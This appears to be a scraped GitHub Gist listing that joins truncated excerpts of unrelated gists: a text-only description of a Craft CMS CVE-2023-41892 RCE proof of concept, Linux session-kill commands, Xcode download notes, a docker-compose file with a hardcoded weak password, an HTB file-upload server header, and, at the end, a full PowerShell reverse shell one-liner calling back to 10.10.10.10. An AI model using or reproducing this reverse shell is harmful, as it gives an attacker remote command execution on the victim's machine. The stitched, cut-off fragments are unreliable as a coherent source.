lisp3r lisp3r

This Gist provides a Proof-of-Concept (POC) for CVE-2023-41892, a Craft CMS vulnerability that allows Remote Code Execution (RCE).

Overview

CVE-2023-41892 is a security vulnerability discovered in Craft CMS, a popular content management system. Craft CMS versions affected by this vulnerability allow attackers to execute arbitrary code remotely, potentially compromising the security and integrity of the application.

POC

This POC is depending on writing webshell, so finding a suitable folder with writable permission is necessary.

Kill user tty/pts sessions in Linux

Commands

w: show who is logged on and what they are doing
who: show who is logged on
tty: show current users pseudo terminal
ps -ft pts/1: get process id for the pseudo terminal
pkill: signal process based on name and other attributes

1. Download Xcode from https://developer.apple.com/download/more/ (this requeires to Login in with an Apple Developer Account)

At the moment id don´t know how to authenticate so i have no clue to download the xip via curl/wget.
In my case i downloaded the file and copied it via scp to my mac.

eg. for Xcode 9.2 https://developer.apple.com/services-account/download?path=/Developer_Tools/Xcode_9.2/Xcode_9.2.xip

2. Verify Signature of xip file

pkgutil --verbose --check-signature path/to/xip

	{
	"target":{
	"scope":{
	"advanced_mode":true,
	"exclude":[
	{
	"enabled":true,
	"host":".*\\.google\\.com",
	"protocol":"any"
	},

	#!/bin/bash
	# Kill all steam instances
	sudo kill $(ps ax\|grep "steam" \| awk -F"\ " '{ print $1 }')
	# Kill all wine instances
	sudo wineserver -l

	version: '3.8'

	services:

	# Database - Mongo DB
	mongo:
	image: mongo
	environment:
	MONGO_INITDB_ROOT_USERNAME: helpdev
	MONGO_INITDB_ROOT_PASSWORD: 123456

	Steps
	- install Azure data studio
	- docker container
	- copy file
	- connect
	- import
	- inspect

	# Azure Data Studio
	https://docs.microsoft.com/en-us/sql/azure-data-studio/download-azure-data-studio?view=sql-server-ver15

	#!/usr/env python3
	########################################################################
	#
	# Simple HTTP server that supports file upload for moving data around
	# between boxen on HTB. Based on a gist by bones7456, but mangled by me
	# as I've tried (badly) to port it to Python 3, code golf it, and make
	# It a little more robust. I was also able to strip out a lot of the
	# code trivially because Python3 SimpleHTTPServer is a thing, and the
	# cgi module handles multipart data nicely.
	#

	# -- coding: utf-8 --
	#
	# Used like this:
	#
	# from repermute import ipermute
	#
	# for s in ipermute('[A-Z]\d'):
	# print s
	#
	# Almost all regular expression constructs are supported except for '*'

	# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html

	$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" \| Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()